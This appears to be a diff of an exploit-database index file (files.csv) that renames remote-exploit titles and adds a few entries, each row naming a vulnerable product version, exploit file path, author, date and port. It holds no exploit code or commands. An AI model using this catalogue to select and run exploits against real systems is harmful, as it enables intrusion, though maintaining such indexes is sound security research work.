2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit",2006-12-15,kingcope,linux,remote,21
2936,platforms/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,linux,remote,21
2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0
2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0
2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit",2003-10-15,"Solar Eclipse",linux,remote,21
3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution",2003-10-15,"Solar Eclipse",linux,remote,21
3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445
3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002
3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0
@ -9318,7 +9322,7 @@ id,file,description,date,author,platform,type,port
3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111
3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0
3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0
3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow",2007-03-30,mu-b,linux,remote,53
3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Buffer Overflow",2007-03-30,mu-b,linux,remote,53
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143
3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143
3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0
@ -9331,7 +9335,7 @@ id,file,description,date,author,platform,type,port
3662,platforms/windows/remote/3662.rb,"AOL SuperBuddy - ActiveX Control Remote Code Execution (Metasploit)",2007-04-04,"Krad Chad",windows,remote,0
3675,platforms/windows/remote/3675.rb,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (2)",2007-04-06,"Umesh Wanve",windows,remote,21
3680,platforms/windows/remote/3680.sh,"Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow",2007-04-07,axis,windows,remote,80
3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0
3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 - Kadmind Buffer Overflow",2007-04-10,c0ntex,linux,remote,0
3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0
3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - (Specially Crafted 802.11 Packets) Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0
3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote,0
@ -9358,7 +9362,7 @@ id,file,description,date,author,platform,type,port
3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0
3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080
3916,platforms/windows/remote/3916.php,"VImpX ActiveX (VImpX.ocx 4.7.3.0) - Remote Buffer Overflow",2007-05-13,rgod,windows,remote,0
3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield)",2007-05-14,Xpl017Elz,linux,remote,8080
3922,platforms/linux/remote/3922.c,"webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution",2007-05-14,Xpl017Elz,linux,remote,8080
3925,platforms/windows/remote/3925.py,"TinyIdentD 2.2 - Remote Buffer Overflow",2007-05-14,"Thomas Pollet",windows,remote,113
3927,platforms/windows/remote/3927.html,"DeWizardX - 'DEWizardAX.ocx' Arbitrary File Overwrite",2007-05-15,shinnai,windows,remote,0
3934,platforms/windows/remote/3934.py,"Eudora 7.1 - SMTP ResponseRemote Remote Buffer Overflow",2007-05-15,h07,windows,remote,0
@ -9588,19 +9592,19 @@ id,file,description,date,author,platform,type,port
5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote,0
5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",windows,remote,0
5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,multiple,remote,0
5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0
5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution",2008-03-09,DarkFig,linux,remote,0
5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0
5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0
5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0
5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
5248,platforms/windows/remote/5248.py,"Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143
5249,platforms/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote,0
5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0
5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143
5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0
5269,platforms/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0
5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0
5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution",2008-03-20,kingcope,solaris,remote,0
5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0
5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit",2008-03-21,"Pranav Joshi",hardware,remote,0
5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",hardware,remote,0
5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0
5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69
5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69
@ -9608,7 +9612,7 @@ id,file,description,date,author,platform,type,port
5332,platforms/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0
5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0
5342,platforms/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - OVAS.exe SEH Unauthenticated Overflow",2008-04-02,muts,windows,remote,7510
5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
5366,platforms/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote,0
5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80
5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0
5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0
@ -9652,7 +9656,7 @@ id,file,description,date,author,platform,type,port
6012,platforms/windows/remote/6012.php,"CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80
6013,platforms/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote,0
6026,platforms/linux/remote/6026.pl,"Trixbox - (langChoice) Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80
6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)",2008-07-12,muts,linux,remote,80
6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80
6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80
6094,platforms/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit",2008-07-17,eliteboy,linux,remote,0
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,windows,remote,80
@ -9713,7 +9717,7 @@ id,file,description,date,author,platform,type,port
6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0
6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0
6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0
6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111
6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Code Execution",2008-10-19,kingcope,solaris,remote,111
6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,windows,remote,0
6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0
6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22
@ -10125,11 +10129,11 @@ id,file,description,date,author,platform,type,port
11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow",2010-03-02,"S2 Crew",windows,remote,0
11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution",2010-03-09,kingcope,multiple,remote,0
11662,platforms/multiple/remote/11662.txt,"Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution",2010-03-09,kingcope,multiple,remote,0
11668,platforms/windows/remote/11668.rb,"EasyFTP Server 1.7.0.2 - CWD Remote Buffer Overflow (Metasploit)",2010-03-09,blake,windows,remote,0
11683,platforms/windows/remote/11683.rb,"Microsoft Internet Explorer - 'iepeers.dll' Use-After-Free Exploit (Metasploit)",2010-03-10,Trancer,windows,remote,0
11694,platforms/windows/remote/11694.txt,"Skype - URI Handler Input Validation",2010-03-11,"Paul Craig",windows,remote,0
11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0
11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Code Execution",2010-03-13,"Mohammed almutairi",linux,remote,0
11742,platforms/windows/remote/11742.rb,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Buffer Overflow (Metasploit)",2010-03-15,blake,windows,remote,0
11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - 'LtXmlComHelp8.dll' OpenFile() Remote Overflow",2010-03-15,mr_me,windows,remote,0
11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal",2010-03-15,dmnt,windows,remote,21
@ -10232,7 +10236,7 @@ id,file,description,date,author,platform,type,port
14400,platforms/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
14402,platforms/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Remote Root Hash Disclosure",2010-07-18,kingcope,aix,remote,0
14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server - Hash Disclosure",2010-07-18,kingcope,aix,remote,0
14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote,0
14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption",2010-07-20,"Elazar Broad",windows,remote,0
14447,platforms/windows/remote/14447.html,"Multiple Web Browser (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0
@ -10263,7 +10267,7 @@ id,file,description,date,author,platform,type,port
14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0
14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0
14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0
14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
@ -10327,7 +10331,7 @@ id,file,description,date,author,platform,type,port
15648,platforms/windows/remote/15648.html,"J-Integra 2.11 - Remote Code Execution",2010-12-01,bz1p,windows,remote,0
15655,platforms/windows/remote/15655.html,"J-Integra 2.11 - ActiveX SetIdentity() Buffer Overflow",2010-12-01,Dr_IDE,windows,remote,0
15658,platforms/windows/remote/15658.rb,"Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit)",2010-12-02,bz1p,windows,remote,0
15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21
15662,platforms/linux/remote/15662.txt,"ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution",2010-12-02,anonymous,linux,remote,21
15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0
15668,platforms/windows/remote/15668.html,"Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0
15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow",2010-12-05,0v3r,windows,remote,0
@ -10388,7 +10392,7 @@ id,file,description,date,author,platform,type,port
16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,"Khashayar Fereidani",hardware,remote,0
16259,platforms/windows/remote/16259.txt,"Home FTP Server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0
16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt_ H@ckk3y",ios,remote,0
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit",2011-03-04,"Todor Donev",hardware,remote,0
16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution",2011-03-04,"Todor Donev",hardware,remote,0
16278,platforms/ios/remote/16278.py,"iOS iFileExplorer Free - Directory Traversal",2011-03-04,theSmallNothin,ios,remote,0
16285,platforms/linux/remote/16285.rb,"NTP daemon readvar - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,linux,remote,0
16286,platforms/multiple/remote/16286.rb,"RealServer - Describe Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
@ -10583,7 +10587,7 @@ id,file,description,date,author,platform,type,port
16479,platforms/windows/remote/16479.rb,"IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16480,platforms/windows/remote/16480.rb,"MailEnable - IMAPD W3C Logging Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16481,platforms/windows/remote/16481.rb,"Mercur Messaging 2005 - IMAP Login Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0
16482,platforms/windows/remote/16482.rb,"MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16482,platforms/windows/remote/16482.rb,"Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
16483,platforms/windows/remote/16483.rb,"Novell NetMail 3.52d - IMAP STATUS Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16484,platforms/windows/remote/16484.rb,"Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16485,platforms/windows/remote/16485.rb,"MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@ -10929,7 +10933,7 @@ id,file,description,date,author,platform,type,port
16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution (Metasploit)",2011-03-15,Metasploit,windows,remote,0
16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution (Metasploit)",2011-03-16,Metasploit,multiple,remote,0
16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer - CDDA URI Initialization (Metasploit)",2011-03-17,Metasploit,windows,remote,0
17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0
17024,platforms/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0
@ -11083,7 +11087,7 @@ id,file,description,date,author,platform,type,port
18051,platforms/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0
18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0
18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0
18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0
18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0
18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow (DEP Bypass) (Metasploit)",2011-11-07,pasta,windows,remote,0
18092,platforms/windows/remote/18092.html,"Oracle Hyperion Strategic Finance 12.x - Tidestone Formula One WorkBook OLE Control TTF16.ocx Remote Heap Overflow",2011-11-07,rgod,windows,remote,0
18093,platforms/windows/remote/18093.txt,"Oracle - xdb.xdb_pitrig_pkg.PITRIG_DROPMETADATA procedure Exploit",2011-11-07,"David Maman",windows,remote,0
@ -11104,7 +11108,7 @@ id,file,description,date,author,platform,type,port
18190,platforms/windows/remote/18190.rb,"RhinoSoft Serv-U FTPd Server < 4.2 - Buffer Overflow (Metasploit)",2011-12-02,Metasploit,windows,remote,0
18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0
18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - WebServer Stack Buffer Overflow (Metasploit)",2011-12-13,Metasploit,windows,remote,0
18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0
18280,platforms/linux/remote/18280.c,"TelnetD encrypt_keyid - Function Pointer Overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0
18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0
18291,platforms/hardware/remote/18291.txt,"Reaver - WiFi Protected Setup (WPS) Exploit",2011-12-30,cheffner,hardware,remote,0
18984,platforms/multiple/remote/18984.rb,"Apache Struts 2.2.1.1 - Remote Command Execution (Metasploit)",2012-06-05,Metasploit,multiple,remote,0
@ -11229,8 +11233,8 @@ id,file,description,date,author,platform,type,port
19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1 - Exploit",1998-06-30,"Jeff Forristal",multiple,remote,0
19086,platforms/linux/remote/19086.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (1)",1999-02-09,"smiler and cossack",linux,remote,21
19087,platforms/linux/remote/19087.c,"WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - realpath Exploit (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21
19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Remote Root Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0
19092,platforms/multiple/remote/19092.py,"MySQL - Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
19091,platforms/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass (2)",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0
19092,platforms/multiple/remote/19092.py,"MySQL - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0
19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution",1998-12-25,rain.forest.puppy,multiple,remote,0
19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
@ -12357,7 +12361,7 @@ id,file,description,date,author,platform,type,port
22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise",2002-12-16,Andi,unix,remote,0
22085,platforms/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",unix,remote,0
22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0
22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection",2012-10-19,xistence,multiple,remote,0
22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection",2012-10-19,xistence,multiple,remote,0
22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0
22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0
22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote,0
@ -12599,7 +12603,7 @@ id,file,description,date,author,platform,type,port
23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - '.SMIL' File Script Execution",2003-08-19,KrazySnake,windows,remote,0
23044,platforms/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 - Object Type Validation",2003-08-20,"Drew Copley",windows,remote,0
23049,platforms/linux/remote/23049.c,"Srcpd 2.0 - Multiple Buffer Overflow Vulnerabilities",2003-08-21,Over_G,linux,remote,0
23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Root Compromise",2003-08-23,kf,linux,remote,0
23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Code Execution",2003-08-23,kf,linux,remote,0
23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun",2003-08-27,storm,windows,remote,0
23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal",2003-08-30,sickle,windows,remote,0
23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0
@ -15122,6 +15126,9 @@ id,file,description,date,author,platform,type,port
40857,platforms/windows/remote/40857.txt,"Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution",2015-08-17,"David Jorm",windows,remote,0
40858,platforms/hardware/remote/40858.py,"BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution",2016-12-04,"Jeremy Brown",hardware,remote,0
40862,platforms/windows/remote/40862.py,"Alcatel Lucent Omnivista 8770 - Remote Code Execution",2016-12-04,malerisch,windows,remote,0
40867,platforms/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",hardware,remote,0
40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
